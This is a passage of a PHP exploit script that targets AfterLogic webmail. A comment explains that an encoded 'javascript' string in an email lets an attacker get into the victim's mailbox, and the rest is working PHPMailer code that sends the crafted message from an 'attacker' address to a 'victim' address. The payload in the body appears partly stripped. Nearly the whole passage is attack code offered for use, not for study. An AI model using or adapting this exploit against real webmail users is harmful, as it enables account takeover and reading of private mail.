Click Me, Please...\r\n NOTE: javascript html char encode = javaScRipt then you will be able to get into the victim's mailbox via the url: http://[WebSite]/[AfterLogic]/Default.aspx ## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer directory: http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list */ echo ""; require_once('class.phpmailer.php'); $mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch $mail->IsSMTP(); // telling the class to use SMTP /* SETTINGS */ $smtp_user = "username"; // Any valid smtp account $smtp_pass = "password"; // Your PASSWORD $smtp_port = "25"; // SMTP PORT Default: 25 $smtp_host = "localhost"; // Any valid smtp server $from = "attacker@email.com"; // Any email $victim = "victim@email.com"; // Victim email on afterlogic webmail. $subject = "Salam"; // Subject /* Body Text */ $body = 'Click Me, Please...\r\n'; try { $mail->SMTPDebug = 2; // enables SMTP debug information (for testing) $mail->SMTPAuth = false; // enable SMTP authentication $mail->Host = $smtp_host; $mail->Port = $smtp_port; $mail->Username = $smtp_user; // SMTP account username $mail->Password = $smtp_pass; // SMTP account password $mail->SetFrom($from, 'Attacker'); $mail->AddReplyTo($from, 'Attacker'); $mail->AddAddress($victim, 'Victim'); $mail->Subject = $subject; $mail->MsgHTML($body); $mail->Send(); echo "Message Sent OK

\n"; } catch (phpmailerException $e) { echo $e->errorMessage(); } catch (Exception $e) { echo $e->getMessage(); } ?>